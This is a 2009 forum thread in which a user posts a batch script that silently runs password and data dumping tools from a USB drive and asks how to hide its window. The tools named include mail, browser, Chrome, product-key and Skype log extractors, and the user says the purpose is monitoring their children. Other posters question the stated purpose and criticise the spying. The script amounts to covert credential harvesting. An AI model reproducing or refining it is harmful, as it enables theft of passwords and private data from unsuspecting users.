    Completely Hide .bat Operation
    « on: March 01, 2009, 12:23:45 PM »
my .bat file runs for maybe a second, but I do not want the user to know at all that the file has opened. My bat file runs a couple of programs in the background while it executes it in the foreground, which I do not want. What command should I enter to make the bat file disappear? I am running this bat file on a USB and everything works perfect with the exception of the visibility. This is my what my bat is composed of:

    @echo off
    title Opening_Bassim's_USB
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start MyLastSearch.exe /shtml MyLastSearch.html
    start VideoCacheView /copyall "Streamed Videos"
    start iehv.exe /stext iehv.txt
    start ChromePass.exe /stext ChromePass.txt
    start ProduKey.exe /stext ProduKey.txt
    start DriverView.exe /stext DriverView.txt
    start IECacheView.exe /shtml IECacheView.html
    start faview.exe /shtml faview.html
    start skypelogview.exe /stext skypelogview.txt

and also, do I need the @echo off in the beginning?
and lastly, sorry, at the end, how do I make it open my usb drive, what command should I type in at the end of the process?

they are not viruses, they are monitoring tools to see what my kids are up to.

It doesn't matter what the purpose is; if can be used for malicious purposes on any machine.

But to answer your query you cannot hide the batch file completely; at least not without learning another programming language...

I do not understand, what do you mean by another programming language? Couldn't there be a simple command that does so? If not, then how would you minimze my [file name].bat file?

minimize.. .wel that's a different story from hiding.

You would use the START command.

its a different story when your kids do drugs and think that you do not know. That is not the only thing, its hard to keep teenagers in control these days. When I used to be a kid, there was no such thing as talking back to a teacher or principal. Its honestly unbelievable.

Oh, I am sorry, I am not trying to start a fight, but that is my honest reason to do all this, and I just need help. I also hope that you do not support teens like the ones I am growing up in their extra curricular activities. Gosh, I just wish they could be good kids and do their homework. It hurts too see your child go beind bars, or god forbid your children dieing before the parent does, thats why I need to put up some restrictions and/or control.

You sound crazy. Checking your kid's emails and spying on them is somehow going to keep them out of jail or off the mortuary slab? If things have got that bad, they have got away from you, brother.
